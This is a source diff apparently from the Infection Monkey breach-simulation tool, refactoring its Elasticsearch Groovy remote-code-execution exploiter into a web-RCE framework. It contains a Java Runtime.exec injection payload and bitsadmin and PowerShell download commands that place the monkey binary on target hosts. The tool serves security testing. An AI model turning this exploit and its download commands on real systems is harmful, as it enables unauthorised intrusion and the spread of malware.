diff --git a/infection_monkey/exploit/elasticgroovy.py b/infection_monkey/exploit/elasticgroovy.py index 73fe359a5..f83fdc3e7 100644 --- a/infection_monkey/exploit/elasticgroovy.py +++ b/infection_monkey/exploit/elasticgroovy.py @@ -7,13 +7,12 @@ import json import logging import requests -from network.elasticfinger import ES_SERVICE, ES_PORT from exploit.web_rce import WebRCE from model import WGET_HTTP_UPLOAD import re -__author__ = 'danielg' +__author__ = 'danielg, VakarisZ' LOG = logging.getLogger(__name__) @@ -31,55 +30,30 @@ class ElasticGroovyExploiter(WebRCE): % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()""" JAVA_GET_BIT_LINUX = JAVA_CMD % '/bin/uname -m' - DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder - # Both commands are prepared for use in future development RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s' - POWERSHELL_COMMAND = r"powershell -Command \\\"Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing\\\"" + POWERSHELL_COMMAND = r"powershell -Command \\\"Invoke-WebRequest -Uri '%(http_path)s'" \ + r" -OutFile '%(monkey_path)s' -UseBasicParsing\\\"" _TARGET_OS_TYPE = ['linux', 'windows'] def __init__(self, host): super(ElasticGroovyExploiter, self).__init__(host) - def exploit_host(self): - # self.exploit_host_linux() - if ES_SERVICE not in self.host.services: - LOG.info("Host: %s doesn't have ES open" % self.host.ip_addr) - return False - # Build url from host and elastic port(not https) - urls = self.build_potential_urls([[ES_PORT, False]], ['_search?pretty']) - vulnerable_urls = [] - for url in urls: - if self.check_if_exploitable(url): - vulnerable_urls.append(url) - self._exploit_info['vulnerable_urls'] = vulnerable_urls - if not vulnerable_urls: - return False + def get_exploit_config(self): + exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config() + exploit_config['dropper'] = True + exploit_config['url_extensions'] = ['_search?pretty'] + exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': self.RDP_CMDLINE_HTTP} + return exploit_config - if self.skip_exist and self.check_remote_files(vulnerable_urls[0]): - LOG.info("Host %s was already infected under the current configuration, done" % self.host) - return True - - if not self.set_host_arch(vulnerable_urls[0]): - return False - - commands = {'windows': self.RDP_CMDLINE_HTTP, - 'linux': WGET_HTTP_UPLOAD} - - data = self.upload_monkey(vulnerable_urls[0], commands) - - # We can't use 'if not' because response may be '' - if data is not False and data['response'] is False: - return False - - if self.change_permissions(vulnerable_urls[0], data['path']) is False: - return False - - if self.execute_remote_monkey(vulnerable_urls[0], data['path'], True) is False: - return False - - return True + def get_open_service_ports(self, port_list, names): + # We must append elastic port we get from elastic fingerprint module because It's not marked as 'http' service + valid_ports = super(ElasticGroovyExploiter, self).get_open_service_ports(port_list, names) + elastic_service = [service for service in self.host.services if 'elastic-search' in service][0] + elastic_port = [elastic_service.lstrip('elastic-search-'), False] + valid_ports.append(elastic_port) + return valid_ports def exploit(self, url, command): command = re.sub(r"\\", r"\\\\\\\\", command)